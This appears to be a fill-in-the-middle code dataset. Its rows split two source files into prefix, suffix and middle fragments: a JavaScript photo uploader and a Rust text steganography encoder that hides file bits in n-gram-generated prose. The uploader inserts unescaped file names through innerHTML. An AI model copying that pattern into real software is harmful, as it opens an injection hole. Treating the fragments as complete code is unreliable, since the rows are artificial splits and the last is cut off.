queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
} | identifier_body |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
| $("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); |
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button | random_line_split |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
let mut n_down = n;
let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
let mut unique_words: Vec<&str> = vec![];
let mut total_words = 0;
while n_down > 0 {
// we wish to generate a hash map that contains n-grams for each value of n
// from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
// if there is not enough data at a certain n-depth for a certain word, we can
// keep backing off to n - 1 until we find enough data to make a decision on which
// word to use. (or until we hit n == 1, in which case we pick a random word).
let mut grams: Vec<Vec<&str>> = vec![];
match n_down {
1 => {
for t in text.split_whitespace() {
grams.push(vec![t]);
}
// for some reason the ngrams crate has difficulty when n == 1,
// so in this case we generate the n gram ourselves by a simple whitespace
// delimiter.
},
_ => {
grams = text.split_whitespace().ngrams(n_down).collect();
}
}
for v in grams {
if n_down == 1 {
total_words += 1;
}
if let Some(val) = hash.get_mut(&v) {
*val += 1;
} else {
if n_down == 1 {
unique_words.push(v[0]);
// if we are on the last n-depth (n == 1),
// that means the vectors only contain one word.
// if the hash does not have this vector of one word yet, then
// this is the first time we are seeing it, so we will add it to
// a vector of unique words.
}
hash.insert(v, 1);
// if the hash does not have this vector yet, add it
// with occurance 1, and next time we see this vector,
// increment the occurance
}
}
n_down -= 1;
}
(hash, unique_words, total_words)
}
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
let mut restricted_chars = vec![];
for key in char_map.keys() {
restricted_chars.push(*key);
}
let word_chars: Vec<char> = gib_word.chars().collect();
for c in word_chars {
if restricted_chars.contains(&c) {
let char_index = restricted_chars.iter().position(|&r| r == c).unwrap();
restricted_chars.remove(char_index);
}
}
restricted_chars
}
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
let word_chars: Vec<char> = word.chars().collect();
let mut good_chars_used = vec![0; good_chars.len()];
for c in word_chars {
if restricted_chars.contains(&c) {
return false;
}
if good_chars.contains(&c) {
let char_index = good_chars.iter().position(|&r| r == c).unwrap();
good_chars_used[char_index] += 1;
}
}
for i in good_chars_used {
if i == 0 {
return false;
}
}
true
}
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
let mut vecs_with_n_items = vec![];
for key in hashmap.keys() {
if key.len() == n {
vecs_with_n_items.push(key);
}
}
let mut count_hash = HashMap::new();
for vec in vecs_with_n_items {
let mut n_minus_1_slice = vec![];
let mut counter = 1;
for word in vec {
if counter < n {
n_minus_1_slice.push(*word);
} else {
break;
}
counter += 1;
}
if let Some(val) = count_hash.get_mut(&n_minus_1_slice) {
*val += 1;
} else {
count_hash.insert(n_minus_1_slice, 1);
}
}
let mut best_vec_count = 0;
let mut best_vec = vec![];
for vec in count_hash.keys() {
let vec_count = count_hash.get(vec).unwrap();
if vec_count > &best_vec_count {
best_vec_count = *vec_count;
best_vec = vec.to_vec();
}
}
best_vec
}
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
let count_of_given = match given.len() {
0 => num_words,
_ => {
if let Some(count) = hashmap.get(given) {
*count as f64
} else {
return 0.0;
}
},
};
let mut word_vec = given.clone();
word_vec.push(word);
let count_of_sequence = if let Some(count) = hashmap.get(&word_vec) {
*count as f64
} else {
return 0.0;
};
count_of_sequence / count_of_given
}
pub fn get_best_word<'a>(
gram: &HashMap<Vec<&str>, usize>,
usable_words: &Vec<&'a str>,
current_words: &Vec<&str>,
n: usize,
total_words: f64,
) -> (&'a str, usize) {
let mut all_p_zero = true;
let mut use_n = n;
let mut max_p_index = 0;
while all_p_zero {
let mut ngram_slice = vec![];
let mut counter = 1;
for word in current_words.iter().rev() {
if counter < use_n {
ngram_slice.push(*word);
}
counter += 1;
}
ngram_slice.reverse();
let last_word = ngram_slice.last().unwrap();
let mut max_p = 0.0;
max_p_index = 0;
for i in 0..usable_words.len() {
let w = &usable_words[i];
if w == last_word {
continue;
}
let p = get_probability_of(w, &ngram_slice, gram, total_words);
// let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
// println!("P({} | {:?}) = {}", w, ngram_slice, p);
if p > max_p {
all_p_zero = false;
max_p_index = i;
max_p = p;
}
}
if all_p_zero {
use_n -= 1;
}
// comment this if using interpolation
if use_n == 1 {
// no point in picking the word that appears the most...
// take our chances and break, and pick a random word from the list.
// println!("reached bottom of use n!");
break;
}
}
use_n -= 1;
if use_n == 0 {
let mut rng = rand::thread_rng();
max_p_index = rng.gen_range(0, usable_words.len());
}
(usable_words[max_p_index], use_n)
}
pub fn wordify(
gram: &HashMap<Vec<&str>, usize>,
n: usize,
file_words: Vec<String>,
rng: &mut StdRng,
bit_to_char_map: &mut HashMap<usize, char>,
unique_words: &Vec<&str>,
total_words: f64,
consecutive_skips: usize,
depth_skip_threshold: usize,
use_shuffle: bool,
) -> Result<String, String> {
let mut char_to_bit_map = HashMap::new();
let mut num_bits = 0;
for bit_val in bit_to_char_map.keys() {
num_bits += 1;
char_to_bit_map.insert(*bit_to_char_map.get(&bit_val).unwrap(), *bit_val);
}
num_bits -= 1;
// let num_words = unique_words.len();
let mut succ_count = 0;
let mut fail_count = 0;
let mut skip_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
let mut consecutive_skips_used = 0;
let mut skip_words = vec![];
if !use_shuffle {
for w in unique_words {
if utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
}
// if not shuffling, skip words get filled in once before
// iterating.
}
while i < file_words.len() {
let gibberish_word = &file_words[i];
let mut used_skip_word = false;
let mut use_keys = vec![];
for key in char_to_bit_map.keys() {
use_keys.push(*key);
}
let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
let mut usable_words = vec![];
if use_shuffle {
skip_words = vec![];
// if shuffling the bit to char map,
// we have to reset the skip words every time because they might
// be different
}
// let mut value_num_list = vec![0; max_value];
for w in unique_words {
// let word_val = get_value_from_word(w, char_value_map, max_value);
// // println!("value for {}: {}", w, get_value_from_word(w, char_value_map, 2));
// value_num_list[word_val] += 1;
if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
fail_count += 1;
text_data.push_str(&gibberish_word);
text_data.push_str(" ");
current_words.push(".");
consecutive_skips_used = 0;
// if there are NO usable words at all then we 'failed'
// to encode this word. we push the gibberish word as is to
// the text data output because we still need to be able to decode it.
// we add a . to current words to stimulate the ngram probability
// for the next word.
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
consecutive_skips_used = 0;
// there is only one usable word, so use it without
// estimating any probabilities. ngram used a depth
// of 0 since we are not evaluating ngrams here.
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
// user can fine-tune the quality of the text output using depth_skip_threshold
// and consecutive skips allowed. The higher both are, the more skip words are used
// which can potentially make the output look more like real text, at the
// expense of encoding less bits per word on average.
// consecutive skips used sets a limit to this such that it forces
// the program to eventually encode a word, otherwise it might
// loop forever in certain situations.
// depth skip threshold allows user to say which n-depths are acceptable.
// lower n-depths produce less realistic.
if n_used <= depth_skip_threshold && consecutive_skips_used < consecutive_skips && skip_words.len() > 0 {
let (best_word2, n_used2) = get_best_word(
gram,
&skip_words,
¤t_words,
n,
total_words
);
n_gram_used[n_used2] += 1;
current_words.push(best_word2);
text_data.push_str(best_word2);
text_data.push_str(" ");
skip_count += 1;
used_skip_word = true;
consecutive_skips_used += 1;
i -= 1;
// we used a skip word, make sure to keep i at its current
// level so that we try to encode this word again
} else {
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
consecutive_skips_used = 0;
// if not using a skip word, we encoded the best possible word according
// to ngrams. add the best word to the text output, as well as the current
// words vec which is used to determine word probabilities for the next
// iteration
}
}
};
if !used_skip_word && use_shuffle {
// only shuffle the bit to char map if we encoded a word
// if we used a skip word, we do NOT want to shuffle as we
// will not be able to properly decode
utils::fill_bit_to_char_map(rng, bit_to_char_map);
char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_words.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
println!("succesfully filled {} words", (succ_count + skip_count));
println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
println!("failed to find a word {} times", fail_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn get_value_vec_from_char_value_mode(
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut value_vec = vec![];
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
value_vec.push(value);
num_bits_remain -= num_bits_to_read as usize;
}
value_vec
}
pub fn get_value_vec(
bit_to_char_map: &mut HashMap<usize, char>,
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
) -> Vec<String> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut sorted_keys = vec![];
let mut value_vec = vec![];
for byte_val in bit_to_char_map.keys() {
sorted_keys.push(*byte_val);
}
sorted_keys.sort_by(|a, b| b.cmp(a));
// sort keys once so you dont need to do it in the iteration.
// the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
// to characters. we iterate over the bit position values, and push the value
// to a sorted_keys vec, and then sort in descending order
// (ie: 0th element is largest)
// we do this because the user provides the number of bits.
// so if the user says number
// of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
if use_shuffle {
utils::fill_bit_to_char_map(rng, bit_to_char_map);
}
value_vec.push(char_str);
num_bits_remain -= num_bits_to_read as usize;
}
// iterate the file that you wish to encode, reading num_bits at a time.
// for each value you read, generate characters that map to the value using the bit to char map
// if using shuffle, the bit to char map gets shuffled according to a seeded rng.
// at the end you have a vector of gibberish strings that you will try to hide
// in words using ngrams.
value_vec
}
pub fn wordify_from_char_value_mode(
gram: &HashMap<Vec<&str>, usize>,
char_to_value_map: &mut HashMap<char, usize>,
n: usize,
file_values: Vec<u8>,
num_bits: usize,
unique_words: &Vec<&str>,
total_words: f64,
use_shuffle: bool,
value_mode: utils::ValueMode,
rng: &mut StdRng,
) -> Result<String, String> {
let mut succ_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
while i < file_values.len() {
let current_val = file_values[i];
let mut usable_words = vec![];
for w in unique_words {
if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
// dont use punctuation in char_value mode because
// punctuation isnt ignored by the decoder. if you want
// to leave punctuation in, you would also have to leave
// the spaces around them which would result in a stego text
// like: he likes cars , toys , and trucks .
// for that reason, I chose to ignore punctuation
continue;
}
let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
if w_val == current_val as usize {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
}
};
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_values.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
println!("succesfully filled {} words", succ_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn encode_char_bit_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
let mut original_bit_to_char_map = bit_to_char_map.clone();
utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify(
&gram_hash,
n_depth,
value_vec,
&mut original_rng,
&mut original_bit_to_char_map,
&unique_words,
total_words as f64,
consecutive_skips,
depth_skip_threshold,
use_shuffle,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode_char_value_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
value_mode: utils::ValueMode,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
let mut original_char_to_value_map = char_to_value_map.clone();
utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
// panic!("dsa");
let mut value_vec = get_value_vec_from_char_value_mode(
&contents,
num_bits,
use_shuffle,
&mut rng,
&mut char_to_value_map,
);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify_from_char_value_mode(
&gram_hash,
&mut original_char_to_value_map,
n_depth,
value_vec,
num_bits,
&unique_words,
total_words as f64,
use_shuffle,
value_mode,
&mut original_rng,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn | (matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | encode | identifier_name |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
let mut n_down = n;
let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
let mut unique_words: Vec<&str> = vec![];
let mut total_words = 0;
while n_down > 0 {
// we wish to generate a hash map that contains n-grams for each value of n
// from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
// if there is not enough data at a certain n-depth for a certain word, we can
// keep backing off to n - 1 until we find enough data to make a decision on which
// word to use. (or until we hit n == 1, in which case we pick a random word).
let mut grams: Vec<Vec<&str>> = vec![];
match n_down {
1 => {
for t in text.split_whitespace() {
grams.push(vec![t]);
}
// for some reason the ngrams crate has difficulty when n == 1,
// so in this case we generate the n gram ourselves by a simple whitespace
// delimiter.
},
